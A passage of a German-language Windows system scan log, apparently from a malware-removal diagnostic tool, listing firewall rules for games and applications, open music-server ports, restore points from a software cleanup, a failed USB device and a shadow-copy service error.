FirewallRules: [{6818289E-239B-49EE-B001-FB69A2E6A8C0}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe
FirewallRules: [{F0859AC3-60E3-4D00-B630-170BF1C441E5}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe
FirewallRules: [{B515A77B-C22A-4D35-957F-4BC619063FF5}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe
FirewallRules: [{42C09225-0BCA-4B7A-A912-874BA402CA17}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe
FirewallRules: [{4F1029AB-0FBD-45F8-9898-689A2D6F9BAC}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{679F21A3-8A59-45B3-8C1E-EFE5E0710C63}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{FB088684-BBC4-4D8B-BBAF-5842DA9EE196}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{2A8CE33E-EC98-4518-B46D-42E1DEA51F46}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [{4D766A26-785C-455E-B90F-F910A14E7B7F}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{451F15F9-2D6B-46B6-ACB5-710CD2226BDD}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [TCP Query User{37632275-71A2-49D8-A0FA-70CCB7875F1E}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [UDP Query User{2314FC4F-415A-4DF3-AA49-81CFB9ACE68A}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [TCP Query User{DA695000-4AF9-41AF-9754-C8FA4C6954C1}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{8D614418-EAB5-437D-8C47-BA5ACE131844}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{A397AF39-676F-4717-8C88-59C336141F49}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{E5A7347B-77B2-483E-8FE8-4CAA8722A8D3}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{7409D24F-3B4B-47E4-91B8-98CDC53334D0}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{4B5DB8A4-B9FF-49E3-A8CF-8F2DDDB8F35E}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{F723C80F-371B-4A95-8F54-FA07E9E42973}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{3059C505-B8D3-418B-AC08-C874D15FA7DE}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [TCP Query User{3C48B5B3-18E3-4B84-A540-634DC83BA8B8}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe
FirewallRules: [UDP Query User{B8D0287B-F1FE-4955-A6F8-D589CB7A01F5}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe
FirewallRules: [{DB86E705-4890-40A5-853E-1F2EEC9DD046}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{C497194B-F1B8-4616-B08F-6951EFC5E468}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [TCP Query User{410E0639-1031-468E-8C0C-9B488EDB7278}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{0A39A2D1-3CAD-4DEE-BFD9-AD76B69202F7}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [{ABF58F19-4D87-4BE8-A373-55D7E1D64B7A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E9500049-D9E9-4E8B-A598-216A386F8B2C}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{6B35CD45-1CCB-44FE-8E73-3326D85DEF6B}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{81BFC3EA-16DF-4E60-B196-7E489C7383B7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{81D600BE-5020-4F81-BFB0-4BF18DA2B05D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{6E5A5B32-5FA5-4BC2-A041-480153DF1E83}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{6347001A-5F4B-4B99-BB7A-524AA41C0AD0}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{56D9A896-9B47-43D5-98CA-538A542BD200}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{D9FC3B0B-F50C-4BC2-BF3F-CDE2F2C9A290}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{5A1C6FA4-8139-4243-B3B8-47B3EFB3EA53}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{A213CF29-EB9C-4BFC-A988-0B1F4472789D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{D64B53D7-E8CD-40BD-9C91-72A20AD3970A}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{F2578368-AA70-433E-B35A-5009C86D1E17}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{9F5E0788-335F-42C1-A22C-50F7D9CDC79D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{32406C39-953C-460B-AFE6-CDE4B232D40D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{3EDA9F19-1F96-411E-8C1C-F563E58A3ADE}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [UDP Query User{68DEDDE0-6036-412F-AA44-08A74EE184D7}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{AE314296-B5C7-4DF4-9374-D088F3A08615}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{FDD2B1D2-8138-4DF1-B121-ED318FBA427B}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{29D2BACC-43CD-4803-B503-59899E87FD68}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe
FirewallRules: [{FECFCD89-9DE5-49A3-B3A4-56AC70E40CD6}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe
FirewallRules: [TCP Query User{D8825ED6-64AE-45C5-B113-ECB7858A95CA}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [UDP Query User{7E395701-8E52-444C-8DA5-90B6FF036164}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [{413FDA69-6273-4C65-BB74-8CE72A1CF6C4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [{9ADFBB2B-0B80-4A64-8FCB-571605B6D8A4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [TCP Query User{A6D22F2F-32BB-4C44-8C74-EBDFE4627990}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [UDP Query User{E0FE8A20-C7CF-4897-B34B-C86C940403CA}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{EBFEFE2F-A517-416E-AB96-B57AFAF058B1}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{37DDA592-72D9-4843-B53B-828006F78A9A}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{7E09FB06-AEB8-47CD-B06C-2F012CFD67D8}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe
FirewallRules: [{44C7FB35-3400-4EEB-A7E0-CAABCFA9010D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe
FirewallRules: [{2E30090F-BF18-4888-8C31-BDFB251C40AA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{1E06EE93-F65D-4232-8C20-FF047C2960B3}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{CB8A9966-C9BA-4D24-8DCF-82CCC446AD7E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe
FirewallRules: [{10D47C8E-1911-4379-B2A7-3DFAF5FECB49}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe
FirewallRules: [TCP Query User{AE697FDF-95CB-4742-AFE1-175E002D0CDD}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{21CEB7FC-0894-4127-82BF-6C74648C47A4}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [{922401B8-85D9-4FC4-B488-C575AD393F0E}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe
FirewallRules: [{A0BED04D-77EC-44B5-A349-7E6248C82D08}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe
FirewallRules: [TCP Query User{6D865778-4B1C-48E3-8EDE-88B07DE0E8CE}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe
FirewallRules: [UDP Query User{13FFCB9B-2BE1-472F-96CE-29F783837766}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe
FirewallRules: [{CB31CEEC-1545-42AA-9B71-7426B88BFB5E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe
FirewallRules: [{61419720-4278-4910-BFAC-E93AF187E7DF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe
FirewallRules: [TCP Query User{9A8EDE9E-029B-47AF-A061-7525FEE74527}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [UDP Query User{9F7A08A0-4DBC-40F2-89AC-5BA6AA0CD90F}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [TCP Query User{B00611DA-10FE-4A45-9987-D344F69AFE59}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{3CE54E08-6C8E-4877-B238-A663ACEC403D}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [TCP Query User{02FD6615-749C-459B-9329-E9D3D840FD87}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [UDP Query User{0849F913-291A-4888-8D45-66C5704945BD}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [TCP Query User{6D5C88B3-7D5E-4872-82F0-A3CB31A96B85}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{5CB68C43-4C63-438F-98EB-749826872FBE}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [{75747872-239D-4591-85C3-EC5A1D6EC796}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{A5A856A7-452C-421E-A65C-1EB4C29A172C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{1508135B-998A-4813-8812-87AD3D57489A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{DA814E91-168A-465A-9266-00F76B832A69}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{4C6E3958-1227-48B4-A938-C23D7B034480}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe
FirewallRules: [{01193C79-C53E-4CB8-B7C2-5F0F8EC74B25}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe
FirewallRules: [{F72D0DCF-6A2B-4F0C-BBA7-0C8DD6BCC27F}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe
FirewallRules: [{A93DA08B-800F-4E4E-8BBB-368C93F6080A}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe
FirewallRules: [{D3231BE9-FB26-4B52-A06F-C76F95C54121}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe
FirewallRules: [{C17DA570-D7C5-4124-A736-398D9CEBB379}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe
FirewallRules: [{F87F2FB5-8593-4BFD-B2A9-A08FA335DB4D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe
FirewallRules: [{DD2FEDAC-B152-4BA8-A685-87BB03D81555}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe
FirewallRules: [{DC75C909-CEA5-498F-B98D-A5FA3673F55B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{67EB36C9-7978-4E8B-B4E2-D789597F76F7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [TCP Query User{1B9BBC75-D6A3-451D-9402-7BF428C6B964}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{9F8F6E86-D511-4F2C-892D-703134694F63}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{8AF18EE4-FBC6-4D0A-BC4E-D3F149CDB2A9}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe
FirewallRules: [{87EB15D3-94CF-4471-A526-5B82C235CB03}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe
FirewallRules: [{CA69E6B0-A279-4343-AF7A-0AF44A42D8DA}] => (Block) LPort=445
FirewallRules: [{E924BE7C-390D-4029-AF9F-F7E5005B87A0}] => (Block) LPort=445
FirewallRules: [{B3BD5C1D-80FD-4A00-BF14-9B9B1B4C9F15}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{38D2290F-C6D2-4166-A44D-3ECDEEA6A2AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [TCP Query User{50D16B60-67AB-488A-AE5C-E61D97824CA9}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{19EF7346-06B2-43ED-8F39-A83414013D6C}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{6DB5B824-C375-4374-B640-5A46AE0D856B}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{2F010EF3-6120-4A95-B9C0-5CD981CCF542}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{09CB81DB-7550-4F7B-B023-18A4A3920F6B}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{692B4130-23BF-4C1F-96BC-5039D5E48ED4}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{C0A906DA-FAB3-4A93-97C7-F59B870BDFA1}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{BF2178FB-4544-451B-9B32-D5A4C31F4FCA}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{F37A5F7E-D189-4815-A302-2891EAFA783C}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{7C735814-90CD-4F3A-A051-211C0BBD9495}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{DAC4BDBD-6873-4C9D-A3D9-1CF7A9DBD691}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{D08800A7-21B0-4FDF-93DC-9BBF11F5F80E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{607765EA-BFDC-4528-857D-9DB7207FA061}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{9C65B7A2-4B3D-4E1D-98A3-4C2662F366C7}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{FEA59EF6-632E-4765-9BA8-17DBA601260E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{5B99B3A8-F2E7-4326-BBDD-FC046CAA57D7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{6AB67BB1-CE72-42C7-B1A7-686993AA20AC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{AFFDAA2A-A01E-4601-9977-4EC518739200}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{064DE8B2-CDAB-4E65-AA20-4F44B1C38564}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{F30A19A3-5234-4E0D-8B86-B393932138B4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{EA33863E-67CD-4843-A527-7077DE793E0E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{ED9892D6-6D9D-426F-97C9-38483F4C7806}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{CBC3E334-A8AA-4AA9-8952-0DDC79CEEFC1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
DomainProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI)
DomainProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI)
DomainProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI)
DomainProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI)
DomainProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI)
DomainProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI)
DomainProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI)
DomainProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI)
DomainProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI)
DomainProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI)
DomainProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI)
DomainProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI)
DomainProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI)
DomainProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI)
DomainProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI)
DomainProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp
DomainProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp
DomainProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp
DomainProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp
StandardProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI)
StandardProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI)
StandardProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI)
StandardProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI)
StandardProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI)
StandardProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI)
StandardProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI)
StandardProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI)
StandardProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI)
StandardProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI)
StandardProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI)
StandardProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI)
StandardProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI)
StandardProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI)
StandardProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI)
StandardProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp
StandardProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp
StandardProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp
StandardProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp

==================== Wiederherstellungspunkte =========================

31-07-2017 01:36:50 Removed simplitec simplicheck
01-08-2017 12:29:49 Malwarebytes Anti-Rootkit Restore Point
05-08-2017 22:59:27 Revo Uninstaller's restore point - Adobe Acrobat Reader DC - Deutsch
05-08-2017 23:02:31 Revo Uninstaller's restore point - 7-Zip 9.20 (x64 edition)
05-08-2017 23:03:57 Revo Uninstaller's restore point - Avira Antivirus
05-08-2017 23:06:04 Revo Uninstaller's restore point - Advanced SystemCare 10
05-08-2017 23:11:19 Revo Uninstaller's restore point - Avira System Speedup
05-08-2017 23:12:26 Revo Uninstaller's restore point - Batman: Arkham City GOTY
05-08-2017 23:13:06 Revo Uninstaller's restore point - Avira Software Updater
05-08-2017 23:13:13 Removed Avira Software Updater
05-08-2017 23:13:50 Revo Uninstaller's restore point - Avira Connect
05-08-2017 23:14:16 Revo Uninstaller's restore point - Avira Phantom VPN
05-08-2017 23:14:52 Revo Uninstaller's restore point - Avira Connect
05-08-2017 23:15:50 Revo Uninstaller's restore point - Deus Ex: Mankind Divided™
05-08-2017 23:16:28 Revo Uninstaller's restore point - Dying Light
05-08-2017 23:16:56 Revo Uninstaller's restore point - Fallout: New Vegas
05-08-2017 23:17:21 Revo Uninstaller's restore point - Driver Booster 4.5
05-08-2017 23:17:55 Revo Uninstaller's restore point - Command & Conquer™ Red Alert 2 and Yuri’s Revenge
05-08-2017 23:18:51 Revo Uninstaller's restore point - Mozilla Firefox 54.0.1 (x86 de)
05-08-2017 23:19:55 Revo Uninstaller's restore point - System Shock 2
05-08-2017 23:20:31 Revo Uninstaller's restore point - Smart Defrag 5
05-08-2017 23:22:02 Revo Uninstaller's restore point - Metro: Last Light
05-08-2017 23:22:32 Revo Uninstaller's restore point - Futuremark SystemInfo
05-08-2017 23:22:38 Removed Futuremark SystemInfo
05-08-2017 23:23:32 Revo Uninstaller's restore point - The Banner Saga 2
05-08-2017 23:24:33 Revo Uninstaller's restore point - State of Decay
05-08-2017 23:25:37 Revo Uninstaller's restore point - 3DMark
05-08-2017 23:27:30 Revo Uninstaller's restore point - State of Decay
05-08-2017 23:28:01 Revo Uninstaller's restore point - WestwoodOnline
05-08-2017 23:28:29 Revo Uninstaller's restore point - WestwoodOnline
05-08-2017 23:29:30 Revo Uninstaller's restore point - Skype Click to Call
05-08-2017 23:30:19 Revo Uninstaller's restore point - Skype Click to Call
05-08-2017 23:41:58 Revo Uninstaller's restore point - Jade Empire
06-08-2017 00:18:38 Revo Uninstaller's restore point - Free Studio
06-08-2017 00:19:24 Revo Uninstaller's restore point - IObit Uninstaller
06-08-2017 00:31:22 Revo Uninstaller's restore point - Free Studio
06-08-2017 00:33:21 Revo Uninstaller's restore point - Trojan Remover
06-08-2017 00:59:33 Revo Uninstaller's restore point - GNU Image Manipulation Program

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.)
Description: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.)
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Standard-USB-Hostcontroller)
Service: 
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. 


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (08/06/2017 12:59:33 AM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.


Vorgang:
   Generatordaten werden gesammelt

Kontext:
   Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
   Generatorname: System Writer
